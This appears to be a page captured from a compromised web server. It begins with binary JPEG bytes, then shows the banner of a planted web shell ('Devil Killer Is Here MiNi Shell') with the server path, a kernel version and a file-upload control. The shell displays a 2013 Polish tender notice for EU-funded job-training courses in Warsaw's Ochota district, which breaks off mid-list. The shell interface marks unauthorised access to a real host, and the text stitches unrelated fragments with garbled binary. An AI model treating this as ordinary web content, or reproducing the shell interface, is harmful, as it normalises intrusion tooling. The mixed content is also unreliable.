JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130320/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130320/111764-N-2013.html

<p class="kh_header"><b>Warszawa: szkolenia dla uczestników  Programu aktywizacji zawodowej bezrobotnych i biernych  zawodowo osób z Dzielnicy Ochota (projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1)</b><br>
<b>Numer ogłoszenia: 111764 - 2013; data zamieszczenia: 20.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Ochota m. st. Warszawy , ul. Przemyska 11, 02-361 Warszawa, woj. mazowieckie, tel. 022 8221124, faks 022 8176463.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://opsochota.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> szkolenia dla uczestników  Programu aktywizacji zawodowej bezrobotnych i biernych  zawodowo osób z Dzielnicy Ochota (projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W celu umożliwienia składania ofert częściowych przedmiot zamówienia podzielono na siedem części:
Cz. 1. Kurs pt.: Zastosowanie komputera i aplikacji MS Office w pracy biurowej - dla 13 osób. Czas trwania kursu:  min. 35 godzin zegarowych.
Cz. 2. Kurs nauki języka niemieckiego na poziomie podstawowym - dla 1 osoby. Czas trwania kursu - 60 godz.
Cz. 3. Kurs nauki języka angielskiego na poziomie podstawowym - dla 1 osoby. Czas trwania kursu - 60 godz.
Część 4 - Kurs opiekuna w żłobku i klubie dziecięcym - dla 2 osób. Czas trwania kursu: 280 godzin (w tym 80 godz. praktyki)
Część 5 - Kurs masażu -  dla 1 osoby. Czas trwania kursu: 120 godzin (w tym 90 godzin zajęć praktycznych)
Część 6 - Kurs podstaw wizażu - dla 1 osoby. Czas trwania kursu:  min. 50 godzin.
Część 7 - Kurs konserwator terenów zielonych - dla 2 osób
Czas trwania kursu:  min. 40 godz.
Każdy kurs kończy się wydaniem zaświadczenia o ukończeniu kursu. Zaświadczenie powinno być oznakowane logo PO KL i zawierać informację Szkolenie zostało sfinansowane ze środków Europejskiego Funduszu Społecznego. Rodzaj wymaganego zaświadczenia opisany został w opisie poszczególnych części zamówienia.
Miejsce realizacji: Warszawa.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do części 1 zamówienia na podst. art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0, 80.58.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca wykaże, że jest wpisany do Rejestru Instytucji Szkoleniowych Wojewódzkiego Urzędu Pracy właściwego dla jego siedziby</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 30 000,00 zł (słownie złotych: trzydzieści tysięcy 00/100)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Program szkolenia (zakres tematyczny) wraz z harmonogramem jego realizacji.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://opsochota.bip.um.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego: ul. Przemyska 11, 02-361 Warszawa - pok. 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2013 godzina 10:00, miejsce: siedziba zamawiającego: ul. Przemyska 11, 02-361 Warszawa - pok. 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs pt.: Zastosowanie komputera i aplikacji MS Office w pracy biurowej - dla 13 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny kursu będzie obejmował m.in. następujące zagadnienia: 
1. Budowa i działanie komputera
- definicje pojęć
- budowa, działanie komputera
- procesor, pamięć operacyjna
- podstawowe urządzenia wejścia i wyjścia
- uruchamianie programów MS Office w systemie Windows
2. MS Word:
- elementy ekranu
- polecenia i opcje pracy z programem
- tworzenie dokumentu
- podstawowe pojęcia (akapit, spacja itp.)
- formatowanie dokumentu
- operacje zapisywania
- tworzenie tabel
- wstawianie obiektów (np. obrazów)
3. MS Excel:
- podstawowe pojęcia (komórka, arkusz, skoroszyt)
- wprowadzanie i edycja danych
- kopiowanie i przenoszenie
- wstawianie u usuwanie wierszy, kolumn, komórek
- formatowanie komórek
- formuły i funkcje
- wykresy 
4. MS Power Point:
- zasady tworzenia prezentacji
- personalizacja programu
- tworzenie prezentacji z szablonu i za pomocą kreatora prezentacji
- tekst i grafika i inne elementy w prezentacji
- przygotowanie prezentacji do pokazu i prezentacji w sieci
5. Poczta elektroniczna:
- zakładanie konta pocztowego, konfiguracja konta na serwerze
-  praca w MS Outlook Express  
 - odbieranie, wysyłanie i przechowywanie poczty
- książka adresowa - dodawanie i konfiguracja kontaktów
6. Korzystanie z Internetu:
- podłączenie komputera do Internetu
- wybór i obsługa przeglądarki Internetowej
- wyszukiwanie informacji
- importowanie i zapisywanie materiałów z sieci
- popularne serwisy internetowe
7. Inne zastosowanie komputera:
- katalogowanie dokumentów, pliki, foldery
- katalogowanie i przeglądanie zdjęć 
- skanowanie dokumentu
- obsługa odtwarzacza CD/DVD
- drukowanie dokumentów w różnych konfiguracjach
- współpraca z aparatem fotograficznym, telefonem komórkowym
- zapisywanie danych na nośnikach (płyta CD, DVD, pendrive, karta pamięci itp.)
- odtwarzanie muzyki.
Czas trwania kursu:  min. 35 godzin zegarowych
Wykonawca zapewni:  
1.przeprowadzenie kursu przez wykwalifikowaną kadrę posiadającą doświadczenie w realizacji tego typu szkoleń    
2.pracę uczestników kursu w systemie Windows 7 i MS Office 2010
3.sprzęt niezbędny do przeprowadzenia kursu, w tym: komputery stacjonarne z monitorami LCD (lub notebooki) z nagrywarką CD-DVD, drukarki czarno-białe, drukarka kolorowa, skaner, rzutnik i ekran 
4.materiały szkoleniowe niezbędne do nauki teoretycznej i praktycznej treści kursu (m.in. podręcznik, materiał z kursu - w wersji drukowanej i nagrany na pamięć przenośną typu pendrive - dla każdego uczestnika szkolenia)  
5.materiały piśmienne takie jak: notes, długopis, teczka kartonowa na dokumenty, dla każdego uczestnika szkolenia)  
6.przeprowadzenie kursu w systemie: jedna osoba = jedno stanowisko komputerowe, w podziale na 2 grupy po max. 8 osób lub 3 grupy po max. 6 osób
7.zajęcia będą odbywać się pomiędzy godz. 8.00 a 14.00   
8.jednorazowe zajęcia trwające nie dłużej niż 5 godz. zegarowych (z uwzględnieniem przerw)
9.catering dla uczestników kursu składający się z: wody mineralnej, kawy, herbaty, cytryny, cukru, śmietanki do kawy, ciastek kruchych i kanapek
10.przeprowadzenie ankiet oceniających efektywność i jakość szkoleń
 Kurs kończy się wydaniem zaświadczenia o ukończeniu kursu. Zaświadczenie powinno być oznakowane logo PO KL i zawierać informację Szkolenie zostało sfinansowane ze środków Europejskiego Funduszu Społecznego
Usługa będzie realizowana w terminie - od daty podpisania umowy do 15.05.2013 r.
Miejsce realizacji: Warszawa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs nauki języka niemieckiego na poziomie podstawowym - dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny kursu będzie obejmował m.in. następujące zagadnienia: 
1.wprowadzenie słownictwa oraz podstawowych struktur gramatycznych 
2.przełamanie bariery komunikacyjnej poprzez ćwiczenia praktyczne  
3.ćwiczenie rozumienia języka mówionego w zakresie sytuacji codziennych   
4.tworzenie podstawowych umiejętności porozumiewania 
5.czytanie i rozumienia prostszych tekstów, pisania notatek. 
Czas trwania kursu - 60 godz.
Wykonawca zapewni: 
1.przeprowadzenie kursu przez wykwalifikowaną kadrę, salę dydaktyczną 
2.sprzęt niezbędny do przeprowadzenia kursu 
3.materiały szkoleniowe niezbędne do nauki teoretycznej i praktycznej treści kursu (m.in. niezbędny podręcznik, materiał z kursu - w wersji drukowanej oraz nagrany na pamięć przenośną typu pendrive - dla uczestnika szkolenia)  
4.materiały piśmienne takie jak: notes, długopis, teczka kartonowa na dokumenty, dla uczestnika szkolenia) 
5.zajęcia będą odbywać się pomiędzy godz. 9.00 a 13.00.
Kurs kończy się wydaniem zaświadczenia o ukończeniu kursu zgodnie z rozporządzeniem MEN z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych. Zaświadczenie powinno być oznakowane logo PO KL i zawierać informację Szkolenie zostało sfinansowane ze środków Europejskiego Funduszu Społecznego.
Usługa będzie realizowana w terminie: - od daty podpisania umowy  do 20.06.2013 r. w dni robocze.
Miejsce realizacji: Warszawa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.58.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs nauki języka angielskiego na poziomie podstawowym - dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny kursu będzie obejmował m.in. następujące zagadnienia: 
1.wprowadzenie słownictwa oraz podstawowych struktur gramatycznych 
2.przełamanie bariery komunikacyjnej poprzez ćwiczenia praktyczne  
3.ćwiczenie rozumienia języka mówionego w zakresie sytuacji codziennych   
4.tworzenie podstawowych umiejętności porozumiewania 
5.czytanie i rozumienia prostszych tekstów, pisania notatek 
Czas trwania kursu - 60 godz.
Wykonawca zapewni: 
1.przeprowadzenie kursu przez wykwalifikowaną kadrę, salę dydaktyczną 
2.sprzęt niezbędny do przeprowadzenia kursu 
3.materiały szkoleniowe niezbędne do nauki teoretycznej i praktycznej treści kursu (m.in. niezbędny podręcznik, materiał z kursu - w wersji drukowanej oraz nagrany na pamięć przenośną typu pendrive - dla uczestnika szkolenia)  
4.materiały piśmienne takie jak: notes, długopis, teczka kartonowa na dokumenty, dla uczestnika szkolenia) 
5.zajęcia będą odbywać się pomiędzy godz. 9.00 a 13.00.
Kurs kończy się wydaniem zaświadczenia o ukończeniu kursu zgodnie z rozporządzeniem MEN z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych. Zaświadczenie powinno być oznakowane logo PO KL i zawierać informację Szkolenie zostało sfinansowane ze środków Europejskiego Funduszu Społecznego.
Usługa będzie realizowana w terminie: od daty podpisania umowy  do 20.06.2013 r. w dni robocze.
Miejsce realizacji: Warszawa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.58.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs opiekuna w żłobku i klubie dziecięcym - dla 2 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny kursu (minimum):
1.Psychopedagogiczne podstawy rozwoju jednostki
2.Rozwój dziecka w okresie wczesnego dzieciństwa
3.Stymulowanie wszechstronnego rozwoju dziecka
4.Kompetencje opiekuna dziecka
Czas trwania kursu: 280 godzin (w tym 80 godz. praktyki)
Wykonawca zapewni: 
1.przeprowadzenie kursu przez wykwalifikowaną kadrę, salę dydaktyczną 
2.sprzęt niezbędny do przeprowadzenia kursu 
3.materiały szkoleniowe niezbędne do nauki teoretycznej i praktycznej treści kursu (m.in. niezbędny podręcznik, materiał z kursu - w wersji drukowanej oraz nagrany na pamięć przenośną typu pendrive - dla uczestnika szkolenia)  
4.materiały piśmienne takie jak: notes, długopis, teczka kartonowa na dokumenty, dla uczestnika szkolenia)
5. niezbędne badania lekarskie
6. catering dla uczestników kursu składający się z: wody mineralnej, kawy, herbaty, cytryny, cukru, śmietanki do kawy, ciastek kruchych i kanapek
Kurs kończy się wydaniem zaświadczenia (certyfikatu) Ministerstwa Pracy i Polityki Społecznej o ukończeniu kursu zgodnego wymogami Ustawy z dn. 4.02.2011 o opiece na dziećmi w wieku do lat 3 oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dn. 25.03.2011 w sprawie zakresu programów szkoleń dla opiekuna w żłobku lub klubie dziecięcym, wolontariusza oraz dziennego opiekuna. Zaświadczenie powinno być oznakowane logo PO KL i zawierać informację Szkolenie zostało sfinansowane ze środków Europejskiego Funduszu Społecznego.
Usługa będzie realizowana w terminie: od daty podpisania umowy  do 20.06.2013 r.
Miejsce realizacji: Warszawa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs masażu -  dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny kursu (minimum):
1.Budowa anatomiczna człowieka
2.Wskazania i przeciwwskazania do masażu
3.Elementy anatomii i fizjologii człowieka
4.Metodyka stosowania masażu
5.Teoria i praktyka masażu klasycznego, sportowego, izometrycznego, relaksacyjnego
Czas trwania kursu: 120 godzin (w tym 90 godzin zajęć praktycznych)
Wykonawca zapewni: 
1.przeprowadzenie kursu przez wykwalifikowaną kadrę, salę dydaktyczną 
2.sprzęt niezbędny do przeprowadzenia kursu 
